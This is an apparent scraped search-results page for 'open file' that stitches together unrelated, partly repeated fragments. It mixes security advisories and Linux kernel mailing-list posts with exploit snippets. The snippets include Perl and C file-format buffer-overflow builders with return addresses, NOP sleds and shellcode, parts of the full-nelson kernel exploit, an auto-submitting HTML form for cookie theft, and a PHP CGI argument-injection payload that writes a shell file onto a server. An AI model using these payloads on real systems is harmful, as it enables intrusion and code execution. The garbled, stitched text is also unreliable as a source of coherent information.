Next Page >>
open file
ZDI-07-078: St. Bernard Open File Manager Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-078.html
December 17, 2007
-- CVE ID:
CVE-2007-6281
-- Affected Vendor:
St. Bernard
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4
my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
"\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
>>>>> "act" as hardlinks. Could that be fixed somehow? (I did look at the
>>>>> kernel fs/proc/base.c but did not make much sense to me...)
>>>>>
>>>> Just looked more carefully at fs/proc/base.c. That behavior is due
>>>> to proc_fd_info() called from proc_fd_link() obtains file->f_path,
>>>> that in turn contains the reference to the open file dentry and
>>>> hence inode. That's exactly why those symlinks behave as hardlinks.
>>>> This behavior assumes, that if you were able to open the file,
>>>> you've all necessary transition permissions to access it's inode.
>>>> But in order to follow them you need privileges to read the process
>>>> memory, which hardly restricts the impact of this behavior. I don't
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
Last login: Tue Dec 13 12:48:54 2010
[root@localhost~]#nano full-nelson.c
[root@localhost~]#gcc-o full-nelson.c full-nelson
[root@localhost~]#./full-nelson
[*] Failed to open file descriptors.
[root@localhost~]# uname-a
Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
[root@localhost~]#
My 10 cents:)
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
printf("[*] Failed to open file descriptors.\n");
return -1;
}
/* Resolve addresses of relevant symbols */
printf("[*] Resolving kernel addresses...\n");
char header2[]=
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D"
"\x0A\x3C\x2F\x61\x73\x78\x3E";
int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1360];
char junk[1012];
char ret[]="\x68\xD5\x85\x7C";
char nop[]="\x90";
printf("==== marakesh city =====\n");
I've tested on:
- Image browser -- by pressing [Open] in File Manager, so that the
application crashes immediately, and File Manager barking "Unable to
open file".
- Gallery -- begins to scan all images in phone memory and card, and
crashes soon, obviously when it encounters nokiacrash.jpg. So, just
putting this file anywhere in the filesystem is Gallery DoS.
* Uli Schlachter reported that bip does not properly handle invalid
data during authentication, resulting in a daemon crash
(CVE-2010-3071).
* Julien Tinnes reported that bip does not check the number of open
file descriptors against FD_SETSIZE, resulting in a stack buffer
overflow (CVE-2012-0806).
Impact
======
such corruption to result in database corruption or arbitrary code
execution, though we have no such exploit and are not aware of any
such exploits in use in the wild.
CVE-2008-0947: In 1.4 and later, this bug can only be triggered in
configurations that allow large numbers of open file descriptors in a
process.
CVE-2008-0948: In versions before 1.3, this bug can be triggered in
similar circumstances, but is further limited to platforms not
defining certain macros in certain C system header files. Solaris 10
|| > User2 can not write to file descriptor 4
|| > User2 _can_ write to /proc/$$/fd/4
However, as has been pointed out elsewhere in this thread, openat()
will at this point allow User2 to open the file for writing, provided
that he has a open file descriptor on the directory, opened with O_SEARCH.
This is a valid but different attack from the race above.
Ciao. Vincent.
--
print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie."
try:
f = open("test.au",'w')
except IOError, e:
print "Unable to open file ", e
sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
f.write(head)
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search
change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie .
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
VERSION = 11.3
00:37 linups:../expl/kernel > uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel > ./test
[*] Failed to open file descriptors.
such corruption to result in database corruption or arbitrary code
execution, though we have no such exploit and are not aware of any
such exploits in use in the wild.
CVE-2008-0947: In 1.4 and later, this bug can only be triggered in
configurations that allow large numbers of open file descriptors in a
process.
CVE-2008-0948: In versions before 1.3, this bug can be triggered in
similar circumstances, but is further limited to platforms not
defining certain macros in certain C system header files. Solaris 10
>
> Last login: Tue Dec 13 12:48:54 2010
> [root@localhost~]#nano full-nelson.c
> [root@localhost~]#gcc-o full-nelson.c full-nelson
> [root@localhost~]#./full-nelson
> [*] Failed to open file descriptors.
> [root@localhost~]# uname-a
> Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
> [root@localhost~]#
>
> My 10 cents:)
print "[+] Exploiting.....\n" ;
my $buff="\x41\x41\x41\x41" x 1000000 ;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c";
my $ret ="\x1a\x0f\x46\x77" ; # jmp ESP in Windows VISTA
my $nop ="\x90" x 20 ;# some lame nops lol
my $exploit = $acc.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $exploit;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
> "act" as hardlinks. Could that be fixed somehow? (I did look at the
> kernel fs/proc/base.c but did not make much sense to me...)
>
Just looked more carefully at fs/proc/base.c. That behavior is due to
proc_fd_info() called from proc_fd_link() obtains file->f_path, that in turn
contains the reference to the open file dentry and hence inode. That's exactly
why those symlinks behave as hardlinks. This behavior assumes, that if you were
able to open the file, you've all necessary transition permissions to access
it's inode. But in order to follow them you need privileges to read the process
memory, which hardly restricts the impact of this behavior. I don't think this
should be fixed, since /proc/<PID>/fd/ is mainly for debugging purposes.
> >"act" as hardlinks. Could that be fixed somehow? (I did look at the
> >kernel fs/proc/base.c but did not make much sense to me...)
> >
> Just looked more carefully at fs/proc/base.c. That behavior is due
> to proc_fd_info() called from proc_fd_link() obtains file->f_path,
> that in turn contains the reference to the open file dentry and
> hence inode. That's exactly why those symlinks behave as hardlinks.
> This behavior assumes, that if you were able to open the file,
> you've all necessary transition permissions to access it's inode.
> But in order to follow them you need privileges to read the process
> memory, which hardly restricts the impact of this behavior. I don't
char header2[]=
"\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61"
"\x78\x3e";
int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1290];
char junk[925];
char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2)
char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
printf(" CoDEd By Ismail ==> marrakesh city");
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.
>
$o_db_user_name = $_POST['o_db_user_name'];
$o_db_password = $_POST['o_db_password'];
//read in the file
$file = "../functions/db_connect.php";
$fh = fopen($file, 'r+');
$contents = fread($fh, filesize($file));
//set up the text to change
$text_to_change = array();
$new_text = array();
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.
openSUSE 11.2 and 11.3 do not have ECONET compiled,
openSUSE 11.1 has ECONET, but not the 0 ptr deref issue.
The CVE-2010-4258 problem is however in all openSUSEs.
> (To recap:
>
> While file permissions allow writing, directory permissions do not
> allow any access at all.
>
> guest has open file descriptor for reading.
>
> Trouble is that guest can upgrade file descriptor to one that allows
> writing.)
>
Enough substituting terms. guest doesn't upgrade file descriptors, he only gets
The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the NFSv4 client in
the Linux kernel before 2.6.31-rc4 allows remote NFS servers to cause
a denial of service (NULL pointer dereference and panic) by sending a
certain response containing incorrect file attributes, which trigger
attempted use of an open file that lacks NFSv4 state. (CVE-2009-3726)
Additionaly, it includes the fixes from the stable kernel version
2.6.27.39. It also fixes issues with the bnx2 module in which the
machine could become unresponsive. For details, see the package
changelog.
> pipe(fildes);
> fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
> fildes[3] = open("/dev/zero", O_RDONLY);
>
> if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
> printf("[*] Failed to open file descriptors.\n");
> return -1;
> }
>
> /* Resolve addresses of relevant symbols */
> printf("[*] Resolving kernel addresses...\n");
Buffer overflow in the RPC library (lib/rpc/rpc_dtablesize.c) used
by libgssrpc and kadmind in MIT Kerberos 5 (krb5) 1.2.2, and probably
other versions before 1.3, when running on systems whose unistd.h
does not define the FD_SETSIZE macro, allows remote attackers to cause
a denial of service (crash) and possibly execute arbitrary code by
triggering a large number of open file descriptors.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2008-0948 to this issue.
RPM Updated:
> pipe(fildes);
> fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
> fildes[3] = open("/dev/zero", O_RDONLY);
>
> if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
> printf("[*] Failed to open file descriptors.\n");
> return -1;
> }
>
> /* Resolve addresses of relevant symbols */
> printf("[*] Resolving kernel addresses...\n");
{
global $html, $shell;
/* Exploiting */
$payload = "<?php \$myFile = \"legalpentest.php\"; \$filehandle =
fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=$shell;
fwrite(\$filehandle, \$Data);fclose(\$filehandle);";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
Next Page>>
|
